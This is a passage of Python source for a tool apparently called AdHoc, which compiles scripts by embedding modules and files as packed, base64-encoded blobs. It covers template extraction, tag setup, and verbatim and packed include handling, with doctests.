Generic table output generator:
>>> output = []
>>> if table:
... output.append(sep)
... output.append(' '.join(pad_cols_c(table.pop(0))).rstrip())
... if table: output.append(sep)
... output.extend([' '.join(pad_cols(cols)).rstrip()
... for cols in table])
... output.append(sep)
>>> i = sys.stdout.write("\\n".join(output))
============== =========
Column1 Column2
============== =========
some text text
some-more-text text text
something text
less
============== =========
'''
# @:adhoc_run_time_section:@ on
mw = [0, "", ""]
def set_(col): # |:clo:|
lc = len(col)
if mw[0] < lc:
mw[0] = lc
mw[1] = " " * lc
mw[2] = "=" * lc
return col
def get_(): # |:clo:|
return mw
return set_, get_
# @:adhoc_run_time_section:@ off
# @:adhoc_template:@ -col-param-closure
# @:adhoc_run_time_section:@ on
tt_ide = False
tt_comment = ''
tt_prefix = ''
tt_suffix = ''
@classmethod
def template_table(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False):
# @:adhoc_run_time_section:@ off
'''Table of template commands.
See :meth:`std_template_param` for `file_`, `source`, `tag`, `is_re`.
'''
# @:adhoc_run_time_section:@ on
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re, all_=True)
pfx = cls.tt_prefix
sfx = cls.tt_suffix
comm = cls.tt_comment
if comm:
comm = ''.join((comm, ' '))
pfx = ''.join((comm, pfx))
if cls.tt_ide:
command = ''.join(('python ', file_))
else:
command = os.path.basename(file_)
# Parse table
table = []
tpl_arg_name = (lambda t: (((not (t.startswith('-') or t.startswith('!'))) and (t)) or (t[1:])))
col_param = [cls.col_param_closure() for i in range(3)]
table.append((col_param[0][0]('Command'), col_param[1][0]('Template'), col_param[2][0]('Type')))
table.extend([
(col_param[0][0](''.join((
pfx,
command, ' --template ',
tpl_arg_name(t[0])
)).rstrip()),
col_param[1][0](''.join((
'# ', t[0]
)).rstrip()),
col_param[2][0](''.join((
t[1], sfx
)).rstrip()),)
for t in cls.template_list(file_, source, tag, is_re, all_=True)])
if cls.tt_ide:
itable = []
headers = table.pop(0)
this_type = None
last_type = None
for cols in reversed(table):
this_type = cols[2].replace('")', '')
if last_type is not None:
if last_type != this_type:
itable.append((''.join((comm, ':ide: +#-+')), '', ''))
itable.append((''.join((comm, '. ', last_type, '()')), '', ''))
itable.append(('', '', ''))
itable.append((''.join((comm, ':ide: ', cols[1].replace('#', 'AdHoc:'))), '', ''))
itable.append(cols)
itable.append(('', '', ''))
last_type = this_type
if last_type is not None:
itable.append((''.join((comm, ':ide: +#-+')), '', ''))
itable.append((''.join((comm, '. ', last_type, '()')), '', ''))
table = [headers]
table.extend(itable)
# Setup table output
mw, padding = (col_param[0][1]()[0], col_param[0][1]()[1])
mw1, padding1 = (col_param[1][1]()[0], col_param[1][1]()[1])
mw2, padding2 = (col_param[2][1]()[0], col_param[2][1]()[1])
sep = ' '.join([cp[1]()[2] for cp in col_param])
make_row_c = lambda row: ''.join((
''.join((padding[:int((mw-len(row[0]))/2)], row[0], padding))[:mw],
' ', ''.join((padding1[:int((mw1-len(row[1]))/2)],
row[1], padding1))[:mw1],
' ', ''.join((padding2[:int((mw2-len(row[2]))/2)],
row[2], padding2))[:mw2].rstrip()))
make_row = lambda row: ''.join((''.join((row[0], padding))[:mw],
' ', ''.join((row[1], padding))[:mw1],
' ', row[2])).rstrip()
# Generate table
output = []
output.append(sep)
output.append(make_row_c(table.pop(0)))
if table:
output.append(sep)
output.extend([make_row(row) for row in table])
output.append(sep)
return output
@classmethod
def get_named_template(cls, name=None, file_=None, source=None, # |:clm:|
tag=None, is_re=False, ignore_mark=False):
# @:adhoc_run_time_section:@ off
'''Extract templates matching section tag and name.
:param name: Template name. If None, standard output name ``-`` is used.
:param tag: If None, `adhoc_template(_v)?` is used.
:param ignore_mark: If True, all templates are mapped to
standard output name ``-``.
If a named template cannot be found and `name` does not start
with ``-``, the template name `-name` is tried.
>>> ign = main("adhoc.py --template adhoc_test.sub".split())
# -*- coding: utf-8 -*-
<BLANKLINE>
ADHOC_TEST_SUB_IMPORTED = True
'''
# @:adhoc_run_time_section:@ on
if name is None:
name = '-'
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re, all_=True)
templates = cls.get_templates(
file_, source, tag, is_re=is_re, ignore_mark=ignore_mark, all_=True)
check_name = name
if check_name not in templates and not name.startswith('-'):
check_name = ''.join(('-', name))
if check_name not in templates and not name.startswith('!'):
check_name = ''.join(('!', name))
if check_name in templates:
template_set = templates[check_name]
else:
template_set = ['', 'adhoc_template']
template = template_set[0]
template_type = template_set[1]
if check_name.startswith('!'):
template = cls.dump_(template, template_type)
return template
@classmethod
def extract_templates(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False, ignore_mark=False,
export=False):
# @:adhoc_run_time_section:@ off
'''Extract template.
# @:adhoc_template_check:@ -mark
A template ...
# @:adhoc_template_check:@
# @:adhoc_template_check:@ -other
Another interleaved
# @:adhoc_template_check:@
# @:adhoc_template_check:@ -mark
continued
# @:adhoc_template_check:@
>>> AdHoc.extract_templates(
... tag=AdHoc.section_tag("adhoc_template_check"))
A template ...
continued
Another interleaved
>>> rt_section = AdHoc.get_templates(
... __file__, None,
... tag=AdHoc.section_tag("adhoc_run_time_section"),
... ignore_mark=True)
>>> rt_section = ''.join(rt_section.values())
.. >>> printf(rt_section)
'''
# @:adhoc_run_time_section:@ on
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re)
templates = cls.get_templates(
file_, source, tag, is_re=is_re, ignore_mark=ignore_mark)
sv_extract_warn = cls.extract_warn
cls.extract_warn = True
for outf, template in sorted(templates.items()):
if outf.startswith('-'):
outf = '-'
if outf == '-' and export:
continue
xfile = cls.check_xfile(outf, cls.extract_dir)
if xfile is not None:
cls.write_source(xfile, template)
cls.extract_warn = sv_extract_warn
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| COMPILER DATA
# --------------------------------------------------
# tags are generated from symbols on init
run_time_flag = None # line
import_flag = None # line
include_flag = None # line
verbatim_flag = None # line
compiled_flag = None # line
run_time_class_flag = None # line
rt_engine_section_tag = None # section
indent_section_tag = None # section
uncomment_section_tag = None # section
enable_section_tag = None # section
disable_section_tag = None # section
remove_section_tag = None # section
import_section_tag = None # section
unpack_section_tag = None # section
template_v_section_tag = None # section
template_section_tag = None # section
run_time_section_tag = None # section
run_time_section = None
run_time_flag_symbol = 'adhoc_run_time' # line
import_flag_symbol = 'adhoc' # line
include_flag_symbol = 'adhoc_include' # line
verbatim_flag_symbol = 'adhoc_verbatim' # line
compiled_flag_symbol = 'adhoc_compiled' # line
run_time_class_symbol = 'adhoc_run_time_class' # line
rt_engine_section_symbol = 'adhoc_run_time_engine' # section
indent_section_symbol = 'adhoc_indent' # section
uncomment_section_symbol = 'adhoc_uncomment' # section
enable_section_symbol = 'adhoc_enable' # section
disable_section_symbol = 'adhoc_disable' # section
remove_section_symbol = 'adhoc_remove' # section
import_section_symbol = 'adhoc_import' # section
unpack_section_symbol = 'adhoc_unpack' # section
template_v_section_symbol = 'adhoc_template_v' # section
template_section_symbol = 'adhoc_template' # section
run_time_section_symbol = 'adhoc_run_time_section' # section
run_time_class_prefix = 'Rt'
import_function = 'AdHoc.import_'
modules = {}
compiling = []
file_include_template = ( # |:api_fi:|
"{ind}"
"# {stg}\n{ind}"
"{rtp}{ahc}("
"{mod},"
" file_={fnm},\n{ina}"
" mtime={mtm},"
" mode={fmd},\n{ina}"
" zipped={zip},"
" flat={flt},"
" source64=\n"
"{src}"
")\n{ind}"
"# {etg}\n"
)
# --------------------------------------------------
# ||:sec:|| Setup
# --------------------------------------------------
def __init__(self): # |:mth:|
self.modules = {}
self.compiling = []
self.setup_tags()
self.run_time_section = self.prepare_run_time_section().rstrip() + '\n'
@classmethod
def setup_tags(cls): # |:mth:|
cls.run_time_flag = cls.line_tag(cls.run_time_flag_symbol)
cls.import_flag = cls.line_tag(cls.import_flag_symbol)
cls.verbatim_flag = cls.line_tag(cls.verbatim_flag_symbol)
cls.include_flag = cls.line_tag(cls.include_flag_symbol)
cls.compiled_flag = cls.line_tag(cls.compiled_flag_symbol)
cls.run_time_class_flag = cls.line_tag(cls.run_time_class_symbol)
cls.rt_engine_section_tag = cls.section_tag(cls.rt_engine_section_symbol)
cls.indent_section_tag = cls.section_tag(cls.indent_section_symbol)
cls.uncomment_section_tag = cls.section_tag(cls.uncomment_section_symbol)
cls.enable_section_tag = cls.section_tag(cls.enable_section_symbol)
cls.disable_section_tag = cls.section_tag(cls.disable_section_symbol)
cls.remove_section_tag = cls.section_tag(cls.remove_section_symbol)
cls.import_section_tag = cls.section_tag(cls.import_section_symbol)
cls.unpack_section_tag = cls.section_tag(cls.unpack_section_symbol)
cls.template_v_section_tag = cls.section_tag(cls.template_v_section_symbol)
cls.template_section_tag = cls.section_tag(cls.template_section_symbol)
cls.run_time_section_tag = cls.section_tag(
cls.run_time_section_symbol)
# --------------------------------------------------
# ||:sec:|| Tools
# --------------------------------------------------
@staticmethod
def strquote(source, indent=(' ' * 4)): # |:fnc:|
source = source.replace("'", "\\'")
length = 78 - 2 - 4 - len(indent)
if length < 50:
length = 50
output_parts = []
indx = 0
limit = len(source)
while indx < limit:
output_parts.extend((
indent, " '", source[indx:indx+length], "'\n"))
indx += length
return ''.join(output_parts)
# --------------------------------------------------
# ||:sec:|| Run-Time Section
# --------------------------------------------------
@classmethod
def adhoc_run_time_sections_from_string(cls, string, symbol): # |:clm:|
tag = sformat('(#[ \t\r]*)?{0}', cls.section_tag(symbol, is_re=True))
def_sections = cls.tag_sections(string, tag, is_re=True)
return def_sections
@classmethod
def adhoc_run_time_section_from_file(cls, file_, symbol): # |:clm:|
if file_.endswith('.pyc'):
file_ = file_[:-1]
string = cls.read_source(file_)
def_sections = cls.adhoc_run_time_sections_from_string(
string, symbol)
return def_sections
@classmethod
def adhoc_get_run_time_section( # |:clm:|
cls, symbol, prolog='', epilog=''):
import datetime
adhoc_module_places = []
# try __file__
adhoc_module_places.append(__file__)
def_sections = cls.adhoc_run_time_section_from_file(
__file__, symbol)
if len(def_sections) == 0:
# try adhoc.__file__
try:
import adhoc
adhoc_module_places.append(adhoc.__file__)
def_sections = cls.adhoc_run_time_section_from_file(
adhoc.__file__, symbol)
except:
pass
if len(def_sections) == 0:
# try adhoc.__adhoc__.source
try:
adhoc_module_places.append('adhoc.__adhoc__.source')
def_sections = cls.adhoc_run_time_sections_from_string(
adhoc.__adhoc__.source, symbol)
except:
pass
if len(def_sections) == 0:
adhoc_dump_list(def_sections)
raise AdHocError(sformat('{0} not found in {1}',
cls.section_tag(symbol),
', '.join(adhoc_module_places)))
def_ = ''.join((
sformat('# {0}\n', cls.remove_section_tag),
sformat('# {0}\n', cls.rt_engine_section_tag),
sformat('# -*- coding: utf-8 -*-\n'),
sformat('# {0} {1}\n', cls.compiled_flag,
datetime.datetime.now(),
# |:todo:| add input filename
),
prolog,
''.join(def_sections),
epilog,
sformat('# {0}\n', cls.rt_engine_section_tag),
sformat('# {0}\n', cls.remove_section_tag),
))
return def_
@classmethod
def prepare_run_time_section(cls): # |:mth:|
rts = cls.adhoc_get_run_time_section(
cls.run_time_section_symbol)
rtc_sections = cls.tag_split(
rts, cls.run_time_class_flag)
transform = []
done = False
use_next = False
for section in rtc_sections:
blob = section[1]
if section[0]:
use_next = blob
continue
if use_next:
if not done:
mo = re.search('class[ \t\r]+', blob)
if mo:
blob = (blob[:mo.end(0)]
+ cls.run_time_class_prefix
+ blob[mo.end(0):])
done = True
else:
#transform.append(use_next)
pass
use_next = False
transform.append(blob)
transform.append(sformat('# {0}\n', cls.remove_section_tag))
transform.append(sformat('# {0}\n', cls.rt_engine_section_tag))
transform.append(sformat('# {0}\n', cls.rt_engine_section_tag))
transform.append(sformat('# {0}\n', cls.remove_section_tag))
rts = ''.join(transform)
if not done:
raise AdHocError(
sformat('run-time class(tag) `{0}` not found in:\n{1}',
cls.run_time_class_flag, rts))
return rts
# --------------------------------------------------
# ||:sec:|| Internal Includer (verbatim)
# --------------------------------------------------
def verbatim_(self, string, name=None): # |:mth:|
'''Entry point for verbatim inclusion.
:returns: string with verbatim included files.
:param string: input string, with |adhoc_verbatim| flags.
:param name: ignored. (API compatibility with
:meth:`AdHoc.compile_`).
.. note:: double commented flags, e.g. ``##``
|adhoc_verbatim|, are ignored.
.. \\|:here:|
>>> section = """\\
... some
... @:""" """adhoc_verbatim:@ {flags} my_verbatim{from_}
... text\\
... """
>>> adhoc = AdHoc()
**Non-existent File**
>>> sv_quiet = AdHoc.quiet
>>> AdHoc.quiet = True
>>> source = adhoc.verbatim_(sformat(section, flags="-2#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -2# my_verbatim
text
>>> AdHoc.quiet = sv_quiet
**Empty File**
>>> source = adhoc.verbatim_(sformat(section, flags="", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
**Empty file, with negative indent, commented**
>>> source = adhoc.verbatim_(sformat(section, flags="-2#", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -2# my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_indent... -2
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Empty file, with overflowing negative indent, commented**
>>> source = adhoc.verbatim_(sformat(section, flags="-8#", from_=" from /dev/null"))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -8# my_verbatim from /dev/null
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, without newline at end of file, commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("no end of line")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4# my_verbatim
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# no end of line
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, with extra newline at end of file, commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("extra end of line\\n\\n")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4#", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4# my_verbatim
# @:adhoc_remove...
# @:adhoc_uncomment...
# @:adhoc_template_v... my_verbatim
# extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_uncomment...
# @:adhoc_remove...
text
**Existing file, without newline at end of file, not commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("no end of line")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="-4", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... -4 my_verbatim
# @:adhoc_remove...
# @:adhoc_template_v... my_verbatim
no end of line
# @:adhoc_template_v...
# @:adhoc_remove...
text
**Existing file, with extra newline at end of file, not commented.**
>>> mvf = open("my_verbatim", "w")
>>> ign = mvf.write("extra end of line\\n\\n")
>>> mvf.close()
>>> source = adhoc.verbatim_(sformat(section, flags="", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... my_verbatim
# @:adhoc_remove...
# @:adhoc_indent:@ -4
# @:adhoc_template_v... my_verbatim
extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_indent:@
# @:adhoc_remove...
text
**Existing file, but override with source /dev/null.**
>>> source = adhoc.verbatim_(sformat(section, flags="/dev/null as", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... /dev/null as my_verbatim
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
**Existing file, override with non-existing source /not-here/.**
>>> if os.path.exists("not-here"):
... os.unlink("not-here")
>>> source = adhoc.verbatim_(sformat(section, flags="not-here as", from_=""))
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_verbatim... not-here as my_verbatim
# @:adhoc_remove...
# @:adhoc_indent... -4
# @:adhoc_template_v... my_verbatim
extra end of line
<BLANKLINE>
# @:adhoc_template_v...
# @:adhoc_indent...
# @:adhoc_remove...
text
>>> os.unlink("my_verbatim")
'''
m = 'is: '
import datetime
# # check for @: adhoc_compiled :@
# adhoc_compiled_lines = self.tag_lines(
# string, self.line_tag('adhoc_compiled'))
# if len(adhoc_compiled_lines) > 0:
# sys.stderr.write(sformat(
# '{0}{1}' 'warning: {2} already AdHoc\'ed `{3}`\n',
# dbg_comm, m, name, adhoc_compiled_lines[0].rstrip()))
# return string
# handle @: adhoc_verbatim :@
result = []
verbatim_cmd_parts = self.tag_split(string, self.verbatim_flag)
for part in verbatim_cmd_parts:
verbatim_def = part[1]
result.append(verbatim_def)
if part[0]:
# skip commented verbatim includes
if re.match('\\s*#\\s*#', verbatim_def):
if self.verbose:
printe(sformat(
'{0}{1}Skipping disabled verbatim `{2}`',
dbg_comm, m, verbatim_def.rstrip()))
continue
indent = ''
mo = re.match('\\s*', verbatim_def)
if mo:
indent = mo.group(0)
verbatim_def = self.line_tag_strip(
verbatim_def, self.verbatim_flag_symbol)
verbatim_specs = []
for verbatim_spec in re.split('\\s*,\\s*', verbatim_def):
verbatim_spec1 = re.split('\\s+from\\s+', verbatim_spec)
verbatim_spec2 = re.split('\\s+as\\s+', verbatim_spec)
default = None
source = None
output = None
flags = None
if len(verbatim_spec1) > 1:
output = verbatim_spec1[0]
default = verbatim_spec1[1]
fields = re.split('\\s+', output, 1)
if len(fields) > 1:
flags = fields[0]
output = fields[1]
else:
flags = ''
source = output
if len(verbatim_spec2) > 1:
source = verbatim_spec2[0]
output = verbatim_spec2[1]
fields = re.split('\\s+', source, 1)
if len(fields) > 1:
flags = fields[0]
source = fields[1]
else:
flags = ''
default = output
if flags is None:
source = verbatim_spec
fields = re.split('\\s+', source, 1)
if len(fields) > 1:
flags = fields[0]
source = fields[1]
else:
flags = ''
source = fields[0]
default = source
output = source
verbatim_specs.append([flags, source, default, output])
for verbatim_spec in verbatim_specs:
vflags = verbatim_spec.pop(0)
ifile = verbatim_spec.pop()
found = False
for lfile in verbatim_spec:
lfile = os.path.expanduser(lfile)
blfile = lfile
for include_dir in self.include_path:
if not os.path.exists(lfile):
if not (os.path.isabs(blfile)):
lfile = os.path.join(include_dir, blfile)
continue
break
if os.path.exists(lfile):
stat = os.stat(lfile)
mtime = datetime.datetime.fromtimestamp(
stat.st_mtime)
mode = stat.st_mode
exp_source = self.read_source(lfile)
source_len = len(exp_source)
start_tags = []
end_tags = []
prefix = []
tag_prefix = ['# ']
mo = re.search('[-+]?[0-9]+', vflags)
if mo:
uindent = int(mo.group(0))
else:
uindent = 0
tindent = (len(indent) + uindent)
if tindent < 0:
tindent = 0
if tindent:
tag = self.indent_section_tag
start_tags.insert(
0, ''.join((tag, ' ', str(-tindent))))
end_tags.append(tag)
prefix.insert(0, ' ' * tindent)
tag_prefix.insert(0, ' ' * tindent)
if '#' in vflags:
tag = self.uncomment_section_tag
start_tags.insert(0, tag)
end_tags.append(tag)
exp_source, hl = self.disable_transform(exp_source)
tag = self.remove_section_tag
start_tags.insert(0, tag)
end_tags.append(tag)
tag = self.section_tag('adhoc_template_v')
start_tags.append(''.join((tag, ' ', ifile)))
end_tags.insert(0,tag)
prefix = ''.join(prefix)
tag_prefix = ''.join(tag_prefix)
if prefix and exp_source:
if exp_source.endswith('\n'):
exp_source = exp_source[:-1]
exp_source = re.sub('^(?m)', prefix, exp_source)
if exp_source and not exp_source.endswith('\n'):
exp_source = ''.join((exp_source, '\n'))
output = []
output.extend([''.join((
tag_prefix, tag, '\n')) for tag in start_tags])
output.append(exp_source)
output.extend([''.join((
tag_prefix, tag, '\n')) for tag in end_tags])
result.append(''.join(output))
found = True
# |:debug:|
if self.verbose:
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d}"
" exp: {6:>6d} ]{9}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:',
'source stats', source_len, len(exp_source),
0, 0, ifile))
# |:debug:|
break
if not found and not self.quiet:
list(map(sys.stderr.write,
("# if: ", self.__class__.__name__,
": warning verbatim file `", ifile,
"` not found from `",
', '.join(verbatim_spec), "`\n")))
#adhoc_dump_list(result)
return ''.join(result)
# --------------------------------------------------
# ||:sec:|| Internal Includer (packed)
# --------------------------------------------------
def include_(self, string, name=None, zipped=True, flat=None): # |:mth:|
'''Entry point for inclusion.
:returns: string with packed included files.
:param string: input string, with |adhoc_include| flags.
:param name: ignored. (API compatibility with
:meth:`AdHoc.compile_`).
:param zipped: if True, :mod:`gzip` included files.
.. note:: double commented flags, e.g. ``##``
|adhoc_include|, are ignored.
.. \\|:here:|
>>> section = """\\
... some
... @:""" """adhoc_include:@ Makefile
... text\\
... """
.. @:adhoc_disable:@
>>> adhoc = AdHoc()
>>> source = adhoc.include_(section)
>>> printf(source) #doctest: +ELLIPSIS
some
@:adhoc_include... Makefile
# @:adhoc_unpack...
RtAdHoc.unpack_(None, file_='Makefile',
mtime='...', mode=...,
zipped=True, flat=None, source64=
...
# @:adhoc_unpack...
text
.. @:adhoc_disable:@
'''
m = 'is: '
import datetime
# # check for @: adhoc_compiled :@
# adhoc_compiled_lines = self.tag_lines(
# string, self.line_tag('adhoc_compiled'))
# if len(adhoc_compiled_lines) > 0:
# sys.stderr.write(sformat(
# '{0}{1}' 'warning: {2} already AdHoc\'ed `{3}`\n',
# dbg_comm, m, name, adhoc_compiled_lines[0].rstrip()))
# return string
# handle @: adhoc_include :@
result = []
include_cmd_sections = self.tag_split(string, self.include_flag)
for section in include_cmd_sections:
include_def = section[1]
result.append(include_def)
if section[0]:
# skip commented includes
if re.match('\\s*#\\s*#', include_def):
if self.verbose:
printe(sformat(
'{0}{1}Skipping disabled include `{2}`',
dbg_comm, m, include_def.rstrip()))
continue
indent = ''
mo = re.match('\\s*', include_def)
if mo:
indent = mo.group(0)
include_def = self.line_tag_strip(
include_def, self.include_flag_symbol)
include_specs = []
for include_spec in re.split('\\s*,\\s*', include_def):
include_spec1 = re.split('\\s+from\\s+', include_spec)
include_spec2 = re.split('\\s+as\\s+', include_spec)
default = None
source = None
output = None
if len(include_spec1) > 1:
output = include_spec1[0]
default = include_spec1[1]
source = output
if len(include_spec2) > 1:
source = include_spec2[0]
output = include_spec2[1]
default = output
if source is None:
source = include_spec
output = source
default = source
include_specs.append([source, default, output])
for include_spec in include_specs:
ifile = include_spec.pop()
found = False
for lfile in include_spec:
lfile = os.path.expanduser(lfile)
blfile = lfile
for include_dir in self.include_path:
if not os.path.exists(lfile):
if not (os.path.isabs(blfile)):
lfile = os.path.join(include_dir, blfile)
continue
break
if os.path.exists(lfile):
stat = os.stat(lfile)
mtime = datetime.datetime.fromtimestamp(
stat.st_mtime)
mode = stat.st_mode
exp_source = self.read_source(lfile, decode=False)
source64 = self.pack_file(exp_source, zipped)
output = self.strquote(source64, indent)
file_include_args = dict([ # |:api_fi:|
('ind', indent),
('ina', ''.join((indent, " "))),
('stg', ''.join((self.unpack_section_tag, ' !', ifile))),
('etg', self.unpack_section_tag),
('rtp', self.run_time_class_prefix),
('ahc', 'AdHoc.unpack_'),
('mod', 'None'),
('fnm', repr(str(ifile))),
('mtm', (((mtime is not None)
and repr(mtime.isoformat()))
or repr(mtime))),
('fmd', (mode is not None and sformat('int("{0:o}", 8)', mode)) or mode),
('zip', zipped),
('flt', flat),
('src', output.rstrip()),
])
output = sformat(
self.file_include_template,
**file_include_args
)
result.append(output)
found = True
# |:debug:|
if self.verbose:
source_len = len(exp_source)
exp_source_len = len(exp_source)
source64_len = len(source64)
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d}"
" exp: {6:>6d} b64: {8:>6d}[ ]{9}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:',
'source stats', source_len, exp_source_len,
0, source64_len, ifile))
# |:debug:|
break
if not found and not self.quiet:
list(map(sys.stderr.write,
("# if: ", self.__class__.__name__,
": warning include file `",
ifile, "` not found from `",
', '.join(include_spec), "`\n")))
#adhoc_dump_list(result)
return ''.join(result)
# --------------------------------------------------
# ||:sec:|| Internal Compiler
# --------------------------------------------------
def encode_module_( # |:mth:|
self, module, for_=None, indent='', zipped=True, flat=None, forced=None):
m = 'gm: '
if for_ is None:
for_ = self.import_function
if forced is None:
forced = self.forced
module = self.module_setup(module)
module_name = module.__name__
# no multiple occurences
if (not forced
and (module_name in self.modules
or module_name in self.compiling)):
if self.verbose:
# |:check:| what, if the previous import was never
# executed?
sys.stderr.write(sformat(
'{0}{1}`{2}` already seen. skipping ...\n',
dbg_comm, m, module_name))
return ''
self.compiling.append(module_name)
result = []
# |:todo:| parent modules
parts = module_name.split('.')
parent_modules = parts[:-1]
if self.verbose and len(parent_modules) > 0:
sys.stderr.write(sformat(
'{0}{1}Handle parent module(s) `{2}`\n',
dbg_comm, m, parent_modules))
for parent_module in parent_modules:
result.append(self.encode_module_(
parent_module, for_, indent, zipped, flat, forced))
if (module_name in self.modules):
if self.verbose:
sys.stderr.write(sformat(
'{0}{1}{1} already seen after parent import\n',
dbg_comm, m, module_name))
return ''.join(result)
if hasattr(module, '__file__'):
module_file = module.__file__
if module_file.endswith('.pyc'):
module_file = module_file[:-1]
else:
module_file = None
if hasattr(module.__adhoc__, 'source'):
source = module.__adhoc__.source
else:
if not self.quiet:
printf(sformat(
'{0}{1}|' 'warning: `{2}` does not have any source code.',
dbg_comm, m, module_name), file=sys.stderr)
source = ''
return ''.join(result)
# recursive!
exp_source = self.compile_(source, module_file, for_, zipped, forced)
source64 = self.pack_file(exp_source, zipped)
output = self.strquote(source64, indent)
mtime = module.__adhoc__.mtime
mode = module.__adhoc__.mode
# |:todo:| make Rt prefix configurable
file_include_args = dict([ # |:api_fi:|
('ind', indent),
('ina', ''.join((indent, " "))),
('stg', ''.join((self.import_section_tag, ' !', module_name))),
('etg', self.import_section_tag),
('rtp', self.run_time_class_prefix),
('ahc', for_),
('mod', repr(module.__name__)),
('fnm', (((module_file is not None)
and repr(str(os.path.relpath(module_file))))
or module_file)),
('mtm', (((mtime is not None)
and repr(mtime.isoformat()))
or repr(mtime))),
('fmd', (mode is not None and sformat('int("{0:o}", 8)', mode)) or mode),
('zip', zipped),
('src', output.rstrip()),
('flt', flat),
])
output = sformat(
self.file_include_template,
**file_include_args
)
result.append(output)
# |:debug:|
if self.verbose:
source_len = len(source)
exp_source_len = len(exp_source)
source64_len = len(source64)
printe(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]len: {5:>6d} exp: {6:>6d}"
" b64: {8:>6d}[ ]{9}[",
dbg_comm, dbg_twid, dbg_fwid, ':INF:',
'source stats', source_len, exp_source_len, 0,
source64_len, module_file))
# |:debug:|
return ''.join(result)
def compile_(self, string, name=None, for_=None, # |:mth:|
zipped=True, forced=None):
'''Entry point for compilation.
:returns: string with fully compiled adhoc source. Includes
run-time class, imports, packed includes, verbatim includes,
enabled/disabled sections.
:param string: input string, with |adhoc| flags.
:param name: for messages.
:param for_: :class:`RtAdHoc` method call.
:param zipped: if True, :mod:`gzip` included files.
.. note:: for |adhoc|, commented lines, e.g.
``# import module # @:``\\ ``adhoc:@``, are ignored.
.. \\|:here:|
'''
m = 'cs: '
if name is None:
name = repr(string[:50])
# check for @: adhoc_compiled :@
string = self.expand_macros(string)
adhoc_compiled_lines = self.tag_lines(
string, self.line_tag('adhoc_compiled'))
if len(adhoc_compiled_lines) > 0:
if not self.quiet:
list(map(sys.stderr.write,
('# ', m, 'warning: ', name, ' already AdHoc\'ed `',
adhoc_compiled_lines[0].rstrip(), '`\n',)))
return string
# check for @: adhoc_self :@ (should not be taken from any templates)
adhoc_self_tag = self.line_tag('adhoc_self')
adhoc_self_lines = self.tag_lines(
string, adhoc_self_tag)
if len(adhoc_self_lines) > 0:
for line in adhoc_self_lines:
line = re.sub(''.join(('^.*', adhoc_self_tag)), '', line)
line = line.strip()
selfs = line.split()
if self.verbose:
printe(sformat(
'{0}{1}|' ':INF:| {2} found self: `{3}`',
dbg_comm, m, name, ', '.join(selfs)))
self.compiling.extend(selfs)
# check for @: adhoc_remove :@
string = self.section_tag_rename(string, 'adhoc_remove', 'adhoc_remove_')
# check for @: adhoc_verbatim :@ (templates can define the run-time flag, includes, imports)
string = self.verbatim_(string, name)
# search for @: adhoc_run_time :@ and put run-time section there!
result = []
ah_run_time_sections = self.tag_split(
string, self.line_tag(self.run_time_flag_symbol))
good = False
for section in ah_run_time_sections:
config_def = section[1]
if not good and section[0]:
# ignore double commented tagged lines
if not re.match('\\s*#\\s*#', config_def):
config_def = sformat('{0}{1}',
config_def, self.run_time_section)
good = True
result.append(config_def)
string = ''.join(result)
# check for @: adhoc_include :@
string = self.include_(string, name, zipped)
# handle @: adhoc :@ imports
result = []
import_cmd_sections = self.tag_split(string, self.import_flag)
if not good and len(import_cmd_sections) > 1:
adhoc_dump_sections(import_cmd_sections)
raise AdHocError(sformat('{0} not found',
self.line_tag(self.run_time_flag_symbol)))
for section in import_cmd_sections:
import_def = section[1]
if section[0]:
# skip commented imports
if re.match('\\s*#', import_def):
if self.verbose:
printe(sformat(
'{0}{1}Skipping disabled `{2}`',
